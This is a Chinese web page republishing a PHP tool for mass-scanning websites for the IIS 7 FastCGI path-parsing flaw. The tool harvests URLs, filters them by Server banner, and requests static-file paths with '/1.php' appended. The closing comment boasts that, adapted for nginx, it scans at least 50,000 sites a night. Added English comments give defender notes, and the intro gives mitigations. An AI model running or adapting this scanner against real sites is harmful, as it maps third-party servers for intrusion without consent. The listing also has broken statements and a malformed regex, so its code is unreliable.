iiswrite漏洞扫描 自动扫描iis7解析漏洞EXP - IIS - 服务器之家


iiswrite漏洞扫描 自动扫描iis7解析漏洞EXP

发布时间:2017-05-02 来源:服务器之家

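Automatic IIS 7 parsing vulnerability exploit:扫描 IIS 7 解析漏洞,并自动检测其是否可被利用。该问题出现在 IIS 7 以 FastCGI 方式运行 PHP 且 `cgi.fix_pathinfo` 为 1 的环境中:在静态文件路径后追加 `/x.php` 的请求会把该静态文件交给 PHP 解释器处理。防护上应将 `cgi.fix_pathinfo` 设为 0,并在处理程序映射的请求限制中要求“仅当请求映射到文件时才调用处理程序”;访问日志中“静态资源路径 + `/*.php`”形式的请求可作为检测线索。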

exploit.php:

// NOTE(review): no opening "<?php" tag is visible in this listing although a closing "?>" ends it;
// the tag was presumably lost when the page was published.
// Start-up banner: prints the title, date, team and author contact lines, then a note (in Chinese)
// saying the script closes automatically when finished and that results are in ok.txt.
print("

[-] Exploit Title: Automatic iis7.0 exploit [-]

[+] Date: 4/9/2011 [+]

[-] Team: DMTeam [-]

[+] Author: Dark'moon [+]

[-] QQ:40497992 [-]

[-] Email: 40497992@ [-]

[+]Start-----------------------------[+]

[-]Explain:完成后自动关闭 打开ok.txt查看结果[-]\r\n");

// Report only fatal run-time errors (E_ERROR); warnings and notices from failed fetches stay hidden.
error_reporting(E_ERROR);

// Remove PHP's execution time limit so the run is not cut off.
set_time_limit(0);

// Stage 1: read list_url.txt and collect URLs from every listed page (see f()).
f();

// URL-harvesting function.
// Fetches the document at $ip (used as a URL/path: it is passed straight to file_get_contents),
// extracts every "scheme://ww[w].host" style match and appends each one to t00ls.txt via write().
// Returns nothing; the only output is the side effect of write().

function pregUrl($ip){

// "@" hides fetch warnings, so an unreachable page simply yields no matches below.
$url = @file_get_contents($ip);

//$url_list = file('data.txt');

// Matches a scheme, "://", "ww" or "www", a dot, then host characters. Hosts that do not
// start with ww/www are not matched by this pattern.
$preg='/[a-zA-z]+:\/\/www?\.[0-9a-zA-z_]+[\.a-z]+/';

if(preg_match_all($preg,$url,$match_all)){

// The pattern has no capture groups, so $match_all holds a single list of full matches.
foreach ($match_all as $value){

// De-duplicate within this one page only; cross-page duplicates are handled later by unique().
$value=array_values(array_unique($value));

foreach ($value as $key=>$ok){

$ok=trim($ok);

// NOTE(review): a bare "print;" has no operand and is not a valid PHP statement; the argument
// was presumably lost in publishing — confirm against the original file.
print;

write($ok);

}

// pregUrl($ok);

}

}

}

// Append helper: adds $data as one CRLF-terminated line to t00ls.txt.
// Every file call is "@"-suppressed, so a failure to open or write produces no warning.
function write($data)
{
    $fh = @fopen('t00ls.txt', "a");
    @fwrite($fh, $data . "\r\n");
    @fclose($fh);
}

// Start function: reads list_url.txt and passes each trimmed line to pregUrl().
function f()
{
    $seedLines = file('list_url.txt');

    foreach ($seedLines as $line) {
        $line = trim($line);
        pregUrl($line);
    }
}

// Stage 2: remove duplicate URLs (see unique()).

// NOTE(review): a bare "print;" has no operand and is not a valid PHP statement; the argument
// was presumably lost in publishing — confirm against the original file.
print;

unique();

// De-duplicates the harvested URLs: reads every line of t00ls.txt, drops repeated lines and
// writes the remainder to list_url.txt. Takes no arguments and returns nothing.
function unique(){

$list_url = file('t00ls.txt');

$filename = 'list_url.txt';

// Mode 'w' truncates list_url.txt, so the original seed list is replaced by the harvested URLs.
$handle = fopen($filename, 'w');

$list_url = array_unique($list_url);

foreach($list_url as $data){

// NOTE(review): a bare "print;" has no operand and is not a valid PHP statement; the argument
// was presumably lost in publishing — confirm against the original file.
print;

// file() was called without flags, so each $data still carries its line ending; none is added here.
fwrite($handle,$data);

}

}

// Stage 3: request the response headers of every URL in list_url.txt and keep the ones
// whose Server line passes the check in Server() (see a()).
a();

// Server-type check.
// Requests the response headers for $url, prints the URL together with its Server header, and
// records the URL in url.txt (via w()) when the printed message contains the digit 7.
// Returns nothing.
// Defender note: this is a banner check only. What the Server header says decides whether this
// script records a host, not whether the host is actually affected, so removing or rewriting the
// banner is not a mitigation for the parsing issue itself.

function Server($url){

// Second argument 1 makes get_headers() return an associative array keyed by header name.
$array = get_headers($url,1);

if(array_key_exists('Server',$array)){

// A header that occurs more than once comes back as an array; those responses are skipped.
if(!is_array($array['Server'])){

$preg = "/7/";

// Message text (Chinese): "URL: <url> server type: <Server header>".
$ma = "网址: ".$url." 服务器类型: ".$array['Server']."\r\n";

echo $ma;

// The pattern is applied to the whole message, so a "7" anywhere in the URL or in the
// Server header satisfies it; it does not specifically identify IIS 7.
if(preg_match($preg,$ma)){

w($url);// call the write function

}

}

}

}

// Read-in function: loads list_url.txt and passes each trimmed line to Server().
function a()
{
    $lines = file('list_url.txt');

    foreach ($lines as $line) {
        $target = trim($line);
        Server($target);
    }
}

// Write function: appends $url as one CRLF-terminated line to url.txt.
function w($url)
{
    $out = fopen('url.txt', 'a');
    $line = $url . "\r\n";
    fwrite($out, $line);
}

// Stage 4: for every URL recorded in url.txt, build and send the probe request (see urltxt()).
urltxt();

// Reads url.txt and passes each trimmed line to img().
function urltxt()
{
    $recorded = file('url.txt');

    foreach ($recorded as $line) {
        $line = trim($line);
        img($line);
    }
}

// Response-code check.
// Sends one request to $url with cURL and looks only at the HTTP status code. A 200 prints
// "<url> may be vulnerable" (Chinese) and records the URL in ok.txt via urlwrite(); any other
// status prints "<url> is not vulnerable". Returns nothing.
// Defender note: the status code is the only evidence used. The response body is never inspected,
// so a site that answers 200 for arbitrary paths is recorded as well; the script's own wording is
// "may be vulnerable". An entry in ok.txt is a candidate to verify, not a confirmed finding.

function curl($url){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

// Include response headers in the transfer.
curl_setopt($ch, CURLOPT_HEADER, true);

// Return the response instead of printing it.
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

// Give up on a request after 20 seconds.
curl_setopt($ch, CURLOPT_TIMEOUT, 20);

// The returned response is discarded; only the transfer info below is used.
curl_exec($ch);

$p=curl_getinfo($ch);

curl_close($ch);

if(trim($p['http_code'])=='200'){

print("$url 可能存在漏洞\r\n");

urlwrite($url);

}else{

print("$url 不存在漏洞\r\n");

}

}

// Static-file lookup.
// Fetches the page at $url, takes the first substring that looks like a path ending in
// .gif/.jpg/.bmp/.png/.swf/.txt, builds "<url>/<that path>/1.php" and hands it to curl().
// Does nothing when the page contains no such path. Returns nothing.
// Defender note: the request this produces has a static-file extension followed by "/1.php" in
// its path. Requests of that shape in access logs are a usable detection signal, and setting
// cgi.fix_pathinfo to 0 stops PHP from treating the static file as the script.

function img($url){

$htm = file_get_contents($url);

// Case-insensitive; only the first match is used (preg_match, not preg_match_all).
$p='/[0-a-ZA-Z_\/]*\.(gif|jpg|bmp|png|swf|txt)/i';

if(preg_match($p,$htm,$match)){

// $match[0] is the full matched path, appended to the site URL ahead of the "/1.php" suffix.
$url = $url.'/'.$match[0].'/1.php';

curl($url);

}

}

// Result writer: appends $url as one CRLF-terminated line to ok.txt, the file the banner
// names as the place to read results.
function urlwrite($url)
{
    $resultFile = fopen('ok.txt', "a");
    $entry = $url . "\r\n";
    fwrite($resultFile, $entry);
}

?>

list_url.txt:

把后缀换了,什么最近出的nginx以前的通杀,一晚至少能扫五万个站。